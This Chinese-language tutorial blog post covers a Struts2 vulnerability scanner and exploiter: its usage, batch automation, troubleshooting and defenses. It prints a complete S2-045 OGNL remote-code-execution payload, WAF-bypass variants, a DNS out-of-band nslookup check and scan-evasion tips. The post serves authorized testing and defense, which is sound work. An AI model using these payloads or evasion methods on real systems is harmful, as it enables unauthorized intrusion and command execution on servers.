Struts2全版本漏洞检测工具实战：原理、应用与自动化集成

1. 项目概述与核心价值

最近在整理内部安全资产时，又翻出了这个老伙计——Struts2系列漏洞利用工具。说它是“老伙计”一点不为过，从S2-001到S2-061，从OGNL表达式注入到远程代码执行，Struts2框架的漏洞史几乎就是一部Web安全攻防的编年史。虽然现在新项目用Struts2的少了，但你去翻翻那些老牌国企、金融、教育机构的资产，Struts2的应用依然广泛，甚至一些核心业务系统还在跑着Struts2-016时代的代码。手里没个趁手的检测工具，做渗透测试或者红队评估的时候，心里总是不踏实。

这个工具，我习惯叫它“Struts2全版本漏洞检测工具(三)”，并不是因为它功能有多花哨，界面有多华丽。恰恰相反，它是个命令行工具，黑底白字，但它的价值在于“全”和“稳”。所谓“全”，是指它覆盖了从远古到近期的数十个Struts2高危漏洞，你不用再为每个漏洞去网上翻找不同的POC（概念验证代码）和EXP（漏洞利用代码）。所谓“稳”，是指它的检测逻辑经过大量实战环境的打磨，误报率低，并且内置了多种绕过WAF（Web应用防火墙）和异常处理的Payload，在复杂的网络环境下依然能保持较高的检出率。对于安全工程师、渗透测试人员甚至是开发人员（用于自检）来说，它都是一个能极大提升效率的利器。今天，我就结合自己多年的使用经验，把这个工具里里外外拆解一遍，分享它的设计思路、核心用法以及那些只有踩过坑才知道的实战技巧。

2. 工具核心架构与设计思路拆解

2.1 为什么需要“全版本”检测工具？

在Struts2漏洞爆发的早期，安全研究员们通常是“出一个漏洞，写一个工具”。这导致工具碎片化严重，安全人员需要维护一个庞大的工具库，每次测试都要手动切换，效率低下且容易遗漏。更麻烦的是，Struts2的漏洞多与OGNL表达式解析有关，但不同版本对OGNL的过滤和沙箱机制有所不同，导致针对某个版本写的Payload，在另一个版本上可能完全失效，甚至触发防护机制被拦截。

这个“全版本”工具的设计初衷，就是为了解决这些问题。它的核心思路是建立一个“漏洞指纹库”和“Payload适配引擎”。指纹库不仅记录了每个漏洞的CVE编号（如S2-045、S2-057）和影响版本范围，更重要的是，它记录了触发该漏洞的关键特征，例如特定的参数名（Content-Type,redirect:）、特定的参数位置（URL参数、HTTP头、Multipart表单）以及服务器返回的错误信息特征。Payload适配引擎则负责根据目标URL的响应特征，智能地选择和变形Payload，以绕过简单的字符串过滤和WAF规则。

2.2 工具模块化设计解析

工具虽然以一个可执行文件呈现，但其内部是高度模块化的，主要可以分为以下几个核心模块：

1. 目标探测与指纹识别模块：这是工具的“眼睛”。它首先会向目标发送一个精心构造的、无害的探测请求（例如，访问一个不存在的.action后缀，或者发送一个包含特定头的请求），通过分析HTTP响应状态码、Server头、报错信息、Set-Cookie字段（有时Struts2的默认错误页面会包含框架信息）等，来判断目标是否使用了Struts2框架，并初步判断其大版本范围。这一步至关重要，它能避免对非Struts2应用进行无谓的漏洞检测，减少噪音。

2. 漏洞载荷库模块：这是工具的“武器库”。它以结构化的方式（如JSON或YAML）存储了所有支持的漏洞利用载荷。每个载荷不仅仅是一段攻击代码，而是一个包含多重信息的对象：

   • 漏洞ID：如s2-016。
   • 影响版本：如Struts 2.0.0 - 2.3.15。
   • 利用位置：Parameter(URL参数)、Header(HTTP头)、Data(POST数据)、Multipart(文件上传头)。
   • 基础Payload：最原始的OGNL表达式，如#_memberAccess[\"allowStaticMethodAccess\"]=true, @java.lang.Runtime@getRuntime().exec('calc')。
   • Payload变种列表：为了绕过过滤，同一个漏洞可能有多种Payload写法，比如使用Unicode编码、十六进制编码、大小写混淆、添加垃圾字符、利用不同的OGNL上下文变量（如#parameters,#request,#attr）等。

3. 检测引擎模块：这是工具的“大脑”。它接收目标信息和选定的漏洞载荷，负责构造完整的HTTP请求。这里有一个关键设计：延时检测与结果判断。工具不是发送Payload后就立刻判断漏洞存在与否，而是会发送一个具有“延时效应”的Payload。例如，Payload不是直接执行whoami并回显，而是执行sleep 5或ping -c 3 127.0.0.1。引擎会记录从发送请求到收到响应的时间差。如果时间差明显大于正常请求（例如，正常请求200ms，检测请求5200ms），则高度怀疑命令执行成功，漏洞存在。这种方式比依赖命令回显（容易被过滤或截断）要可靠得多，尤其适合盲注场景。

4. 结果输出与报告模块：这是工具的“嘴巴”。它将检测结果以清晰的结构化格式输出，通常包括目标URL、检测的漏洞ID、漏洞等级（高危、中危）、使用的Payload类型、以及检测耗时等。好的工具还支持将结果导出为JSON、CSV或HTML报告，方便集成到自动化扫描平台或用于编写渗透测试报告。

3. 核心使用流程与实战操作详解

3.1 环境准备与工具获取

首先，你需要一个可以运行该工具的环境。这类工具通常由Python或Java编写。以Python版本为例，你需要确保本机安装了Python 3.6及以上版本，并且安装了必要的依赖库，最常见的就是requests库，用于发送HTTP请求。

# 检查Python版本 python3 --version # 安装requests库 pip3 install requests

至于工具本体的获取，鉴于安全工具的敏感性，我不会提供直接的下载链接。但你可以通过一些知名的开源安全工具平台（如GitHub）搜索相关的关键词，如 “Struts2-Scan”, “Struts2-Vuln-Scanner” 等，仔细甄别项目的Star数、Issue活跃度和代码质量，选择由活跃社区维护的工具。一个重要的安全准则：永远不要从不明来源下载和执行安全工具，尤其是二进制文件，以防被植入后门。

假设你已经获取了一个名为struts2-scan.py的Python脚本，这就是我们的主角。

3.2 基础扫描模式详解

最基础的用法是指定一个目标URL进行全漏洞扫描。

python3 struts2-scan.py -u http://target.com/login.action

执行这条命令后，工具会按照以下顺序工作：

1. 指纹识别：访问http://target.com/login.action，分析响应，判断是否为Struts2应用。
2. 加载载荷库：读取内置的所有Struts2漏洞Payload。
3. 顺序检测：按照漏洞编号顺序或危险等级顺序，依次向目标发送检测请求。每个请求都使用“延时Payload”。
4. 结果输出：在终端实时显示检测进度。如果发现漏洞，会高亮显示漏洞ID、利用点和验证方式（如：通过延时5秒确认）。

实战技巧一：控制扫描速度与隐蔽性直接全漏洞扫描会产生大量HTTP请求，容易被WAF或IDS（入侵检测系统）封禁。工具通常提供控制选项：

# 设置每个请求之间的延迟为2秒 python3 struts2-scan.py -u http://target.com/login.action --delay 2 # 使用随机User-Agent，模拟正常浏览器 python3 struts2-scan.py -u http://target.com/login.action --random-agent # 仅检测高危漏洞，减少请求次数 python3 struts2-scan.py -u http://target.com/login.action --level high

3.3 高级功能：批量检测与漏洞利用

对于拥有大量目标的情况，批量扫描是必须的。

# 从urls.txt文件中读取目标列表，一行一个URL python3 struts2-scan.py -f urls.txt # 批量扫描，并将结果保存到result.json文件 python3 struts2-scan.py -f urls.txt -o result.json

更高级的功能是漏洞验证后的利用。一个成熟的工具不应止步于检测，还应能提供“证明”。例如，检测到S2-045漏洞存在后，工具可以进一步执行一个无害的命令来验证漏洞的真实危害性。

# 指定检测某个特定漏洞，并使用自定义命令进行验证 python3 struts2-scan.py -u http://target.com/ -v s2-045 --cmd "id"

这里的--cmd "id"参数，工具会将其替换到对应S2-045漏洞的Payload模板中，构造出最终的攻击请求，并尝试获取命令执行结果。请注意，在授权测试中，务必使用无害命令（如whoami,id,echo test），绝对禁止执行rm -rf /、format等破坏性命令。

实战技巧二：处理复杂的应用路径很多Struts2应用并非部署在根路径，或者有复杂的URL路由。工具需要能灵活处理。

# 目标是一个具体的Action端点 python3 struts2-scan.py -u http://target.com/struts2-showcase/integration/saveGangster.action # 如果不知道具体端点，可以尝试对目录进行爬取或结合其他信息搜集工具的结果

4. 漏洞检测原理深度剖析与Payload演变

4.1 以S2-045为例看漏洞本质

S2-045（CVE-2017-5638）是一个经典的“基于Jakarta Multipart解析器的远程代码执行漏洞”。它的根源在于，Struts2在处理文件上传的HTTP请求时，会错误地解析Content-Type头部。攻击者可以在Content-Type字段中注入恶意的OGNL表达式。

工具中针对S2-045的Payload，其核心就是构造一个畸形的Content-Type头：

Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

这个Payload看起来复杂，但其结构是清晰的：

1. 权限获取：(#_memberAccess?(#_memberAccess=#dm):...)这段代码的目的是绕过Struts2的安全沙箱，允许执行静态方法和访问敏感属性。
2. 命令构造：(#cmd='whoami')定义要执行的命令。(#iswin=...)判断操作系统类型，以选择正确的命令行解释器（cmd.exe或/bin/bash）。
3. 命令执行与回显：(#p=new java.lang.ProcessBuilder(#cmds)).(#process=#p.start())创建进程执行命令。@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)将命令执行的结果直接写入HTTP响应流，从而实现回显。

工具在实现时，会将用户通过--cmd参数传入的命令（如id）替换到Payload模板的(#cmd='...')部分，动态生成最终的攻击请求。

4.2 Payload的“进化”与WAF绕过

随着WAF的普及，上述原始Payload很容易被识别和拦截。因此，工具的Payload库必须包含“进化”后的变种。

• 编码绕过：将OGNL表达式中的关键词进行URL编码、十六进制编码或Unicode编码。
  • 原始：getRuntime()
  • URL编码：getRuntime%28%29
  • Unicode编码：\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029
• 字符串拼接：将敏感函数名拆分成多个部分，再利用OGNL的字符串连接功能。
  • #a='getRuntime', #b='()', @java.lang.Runtime@#a#b
• 反射调用：利用Java反射机制，避免直接调用Runtime.getRuntime()。
  • #cl=@java.lang.Class@forName('java.lang.Runtime'), #method=#cl.getMethod('getRuntime'), #obj=#method.invoke(null), #obj.exec('calc')
• 添加垃圾参数：在Payload中插入大量无意义的参数或注释，扰乱WAF的字符串匹配。
  • ...&foo=bar&test=123&...（恶意Payload）...&another=param

一个好的检测工具，其Payload引擎会自动尝试这些变种组合，直到找到一个能成功触发延时效应且不被WAF拦截的Payload为止。

5. 实战中的常见问题与排查技巧实录

即使工具设计得再完善，在实际网络环境中也会遇到各种问题。下面是我总结的一些常见“坑”及解决方法。

5.1 问题一：工具报告“未检测到Struts2框架”

• 可能原因1：目标URL不正确。Struts2的Action可能以.do,.action结尾，也可能没有后缀（通过URL重写）。尝试访问一些常见默认路径，如/index.action,/login.action,/struts2-showcase/，或者使用目录扫描工具（如dirsearch）先发现可能的端点。
• 可能原因2：网络问题或代理配置。工具无法连接到目标。检查网络连通性（ping、telnet），如果测试环境需要走代理，确保工具支持并正确配置了代理参数（如--proxy http://127.0.0.1:8080）。
• 可能原因3：指纹被隐藏。目标服务器可能修改了默认错误页面，隐藏了框架指纹。此时可以尝试使用“强制检测模式”（如果工具提供），即不依赖指纹，直接对所有已知漏洞进行探测，但这会产生大量流量。

5.2 问题二：工具检测到漏洞但延时验证失败

• 可能原因1：Payload被过滤或执行失败。目标系统可能对OGNL表达式做了输入过滤，或者命令执行环境受限（如Runtime.exec被安全管理器禁止）。查看工具是否提供了其他Payload变种，或者尝试使用更简单的验证命令，如echo dGVzdA== | base64 -d（输出test），看是否能回显。
• 可能原因2：网络延迟不稳定。工具设置的延时阈值（如5秒）可能因为网络波动而被误判。可以尝试增加延时阈值（如--timeout 10），或者改用DNS外带技术（如果Payload支持）进行无回显验证，即让目标服务器执行nslookup your-dns-log-server.com，你在自己的DNS服务器上查看日志，这是更隐蔽的验证方式。
• 可能原因3：工具Payload与目标环境不兼容。例如，针对Linux系统的Payload用在了Windows服务器上。高级工具应该能自动或手动指定操作系统类型。

5.3 问题三：扫描过程中请求被中断或IP被封禁

• 解决方案1：降低扫描频率。大幅增加--delay参数的值，比如设置为5秒或10秒，并启用--random-agent。
• 解决方案2：使用代理池。如果条件允许，配置工具使用多个代理IP进行轮询，可以有效分散流量，避免单个IP被封锁。
• 解决方案3：分时段、分漏洞扫描。不要一次性扫描所有漏洞。可以先扫描几个最经典的高危漏洞（如S2-016, S2-045, S2-057），如果都没问题，再考虑在业务低峰期进行深度扫描。

5.4 问题四：工具本身报错或运行异常

• 排查步骤：
  1. 检查Python环境和依赖：运行python3 -c "import requests; print(requests.__version__)"确认requests库已正确安装。
  2. 检查脚本语法：运行python3 -m py_compile struts2-scan.py检查是否有语法错误。
  3. 查看错误信息：仔细阅读命令行报错信息。常见的错误如“Invalid URL”表示URL格式错误；“Connection refused”表示网络不通。
  4. 查阅工具文档或Issues：如果是开源工具，去其GitHub仓库的Issues页面搜索是否有类似问题及解决方案。

重要提示：法律与道德边界所有漏洞检测活动必须在获得明确书面授权的范围内进行。未经授权对任何系统进行扫描或测试，均属违法行为。本工具及文中所述技术仅用于安全研究、教学和授权测试，使用者需自行承担一切法律责任。

6. 工具在自动化流程中的集成应用

对于企业安全团队或专业安全服务厂商，单次手动运行工具效率太低。我们需要将其集成到自动化资产巡检或渗透测试流程中。

6.1 与资产发现平台结合

可以将此工具封装为一个独立的扫描插件。工作流程如下：

1. 资产发现平台（如Shodan、FOFA爬虫，或内部的CMDB）定期输出一批疑似使用Struts2的IP和URL列表。
2. 调度系统（如Jenkins、Rundeck或自研脚本）读取URL列表，并发调用多个struts2-scan.py进程进行扫描。
3. 扫描工具将结果以JSON格式输出到指定目录。
4. 另一个结果聚合脚本解析所有JSON文件，将漏洞数据（目标URL、漏洞ID、发现时间）写入中央数据库（如Elasticsearch）或工单系统（如Jira），自动生成待处理的安全工单。

6.2 编写简单的集成脚本示例

下面是一个简单的Python封装脚本，演示如何批量调用扫描工具并处理结果。

#!/usr/bin/env python3 import subprocess import json import sys from concurrent.futures import ThreadPoolExecutor, as_completed def scan_single_url(url): """对单个URL执行扫描""" cmd = ['python3', 'struts2-scan.py', '-u', url, '-o', 'json', '--quiet'] # --quiet 减少终端输出 try: # 执行扫描命令，设置超时时间 result = subprocess.run(cmd, capture_output=True, text=True, timeout=120) if result.returncode == 0: # 假设工具将JSON结果直接打印到stdout output = result.stdout try: scan_result = json.loads(output) return url, scan_result except json.JSONDecodeError: return url, {'error': 'Failed to parse JSON output', 'raw': output[:200]} else: return url, {'error': f'Scan failed with return code {result.returncode}', 'stderr': result.stderr} except subprocess.TimeoutExpired: return url, {'error': 'Scan timed out after 120 seconds'} except Exception as e: return url, {'error': str(e)} def main(url_list_file): with open(url_list_file, 'r') as f: urls = [line.strip() for line in f if line.strip()] all_results = [] # 使用线程池控制并发数，避免对目标造成过大压力 with ThreadPoolExecutor(max_workers=5) as executor: future_to_url = {executor.submit(scan_single_url, url): url for url in urls} for future in as_completed(future_to_url): url = future_to_url[future] try: url, result = future.result() all_results.append({'url': url, 'result': result}) print(f"Finished scanning: {url}") except Exception as exc: print(f'{url} generated an exception: {exc}') # 将汇总结果保存到文件 with open('batch_scan_results.json', 'w') as f: json.dump(all_results, f, indent=2) print(f"\nScan completed. Results saved to batch_scan_results.json") # 简单统计：打印存在漏洞的URL print("\n[+] Vulnerable Targets Found:") for item in all_results: res = item['result'] if isinstance(res, dict) and res.get('vulnerable') == True: # 根据实际工具的输出结构调整 print(f" - {item['url']}: {res.get('vuln_id', 'N/A')}") if __name__ == '__main__': if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <url_list.txt>") sys.exit(1) main(sys.argv[1])

这个脚本提供了基本的并发扫描和结果聚合功能。在实际集成中，你需要根据所用扫描工具的实际输出格式（是打印到屏幕还是生成文件，JSON结构如何）来调整解析逻辑。

7. 防御视角：如何防范Struts2漏洞被利用

作为一名安全从业者，我们不仅要懂得如何发现漏洞，更要明白如何修复和防御。从防御者角度看，应对Struts2漏洞，治本和治标需结合。

7.1 治本之策：升级与修复

1. 官方补丁：密切关注Apache Struts官方安全公告，一旦有漏洞公布，立即评估影响并升级到已修复的版本。这是最根本、最有效的方法。建立内部的软件成分分析（SCA）流程，持续盘点所有项目中使用的Struts2版本。
2. 代码审计：如果因历史原因无法立即升级，需要对受影响的代码进行人工审计或使用IAST（交互式应用安全测试）工具，定位到使用了漏洞组件的具体位置，尝试通过代码层面对输入进行严格的过滤和校验。
3. 框架替换：对于新建项目，应尽量避免使用已停止维护或漏洞频发的老旧框架。考虑迁移到更现代、维护更积极的MVC框架，如Spring MVC。

7.2 治标之策：外围防护与缓解

1. WAF规则部署：在应用前端部署WAF，并确保其规则库更新到最新，能够识别和拦截常见的Struts2 OGNL注入攻击模式。可以自定义规则，针对Content-Type头、特定参数名（如redirect:）中包含的OGNL关键字（#,@,_memberAccess,getRuntime等）进行过滤。
2. 网络层限制：严格限制服务器出站流量。即使攻击者成功执行了命令，如果无法将结果回传（DNS、HTTP外带）或下载后续恶意软件，其攻击效果也会大打折扣。使用防火墙策略或主机防火墙（如iptables）限制服务器只能访问必要的内部服务和特定的外部更新源。
3. 运行时保护（RASP）：在应用服务器上部署RASP解决方案。RASP能深入到应用运行时内部，监控OGNL表达式的解析和执行过程，一旦发现试图调用危险方法（如Runtime.exec()、ProcessBuilder.start()），立即中断并告警。这种方式不依赖特征码，防御效果更好。
4. 最小权限原则：运行Struts2应用的服务器进程（如Tomcat的Java进程）应使用非root、低权限的用户身份运行。这样即使被攻破，攻击者能造成的破坏也有限。

工具的价值在于帮助我们快速发现风险，而真正的安全在于持续性的治理和扎实的防护措施。将这个Struts2检测工具纳入你的安全武器库，定期对授权资产进行扫描，同时推动开发团队修复漏洞、升级框架，才能构筑起主动防御的安全体系。